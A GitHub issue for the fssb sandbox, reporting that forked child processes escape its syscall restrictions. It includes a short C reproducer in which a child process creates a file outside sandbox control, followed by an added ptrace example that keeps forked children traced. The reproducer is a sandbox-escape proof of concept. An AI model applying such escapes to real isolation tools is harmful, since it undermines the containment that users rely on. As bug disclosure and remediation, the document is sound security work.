
subprocess's syscalls are not limited in fssb so that escape may happen

Open Cossack9989 opened this issue 4 years ago • 0 comments

```c
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

int main(){
	pid_t pid;
	pid = fork();
	printf("pid: %d\n",pid);
	if(pid==0){
		/* child process: the file operation below is the one reported as escaping */
		puts("hello?");
		open("fuck.txt", O_CREAT, 0666);
	}
	return 0;
}
```

As we can see, we create an escaped file by using a subprocess to operate on files.

Cossack9989, Mar 02 '20 03:03
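One way a ptrace-based tracer can keep forked children under the same syscall interception, as an added example that is not code from the issue or from fssb. It assumes the sandbox intercepts syscalls with ptrace (the issue does not say how fssb works); `tracee` and `trace_following_forks` are hypothetical names and the tracee is constructed for the demonstration.

```c
#define _GNU_SOURCE
#include <signal.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed tracee: forks once, as the reproducer in the issue does. */
static void tracee(void) {
    if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) _exit(1);
    raise(SIGSTOP);                 /* let the tracer set options first */
    pid_t c = fork();
    if (c == 0) _exit(0);           /* child makes at least exit_group() */
    waitpid(c, NULL, 0);
    _exit(0);
}

/* Returns the number of descendants auto-attached to the tracer, or -1 on
 * error; *child_stops counts syscall stops seen from those descendants. */
int trace_following_forks(int *child_stops) {
    int status, followed = 0;
    pid_t p, root = fork();
    *child_stops = 0;
    if (root < 0) return -1;
    if (root == 0) tracee();
    if (waitpid(root, &status, 0) < 0 || !WIFSTOPPED(status)) return -1;

    /* Without the TRACE{FORK,VFORK,CLONE} options, new children run untraced. */
    long opts = PTRACE_O_TRACESYSGOOD | PTRACE_O_EXITKILL | PTRACE_O_TRACEFORK |
                PTRACE_O_TRACEVFORK | PTRACE_O_TRACECLONE;
    if (ptrace(PTRACE_SETOPTIONS, root, NULL, (void *)opts) < 0) return -1;
    ptrace(PTRACE_SYSCALL, root, NULL, NULL);

    /* One loop serves every tracee: waitpid(-1) reports stops from all of them. */
    while ((p = waitpid(-1, &status, __WALL)) > 0) {
        if (!WIFSTOPPED(status)) continue;          /* a tracee exited */
        int sig = WSTOPSIG(status), event = (status >> 16) & 0xff;
        if (sig == (SIGTRAP | 0x80)) {              /* syscall entry or exit */
            if (p != root) (*child_stops)++;        /* policy check goes here */
            sig = 0;
        } else if (event == PTRACE_EVENT_FORK || event == PTRACE_EVENT_VFORK ||
                   event == PTRACE_EVENT_CLONE) {
            followed++;                             /* child is now traced too */
            sig = 0;
        } else if (sig == SIGSTOP) {
            sig = 0;                                /* initial stop of new child */
        }
        ptrace(PTRACE_SYSCALL, p, NULL, (void *)(long)sig);
    }
    return followed;
}
```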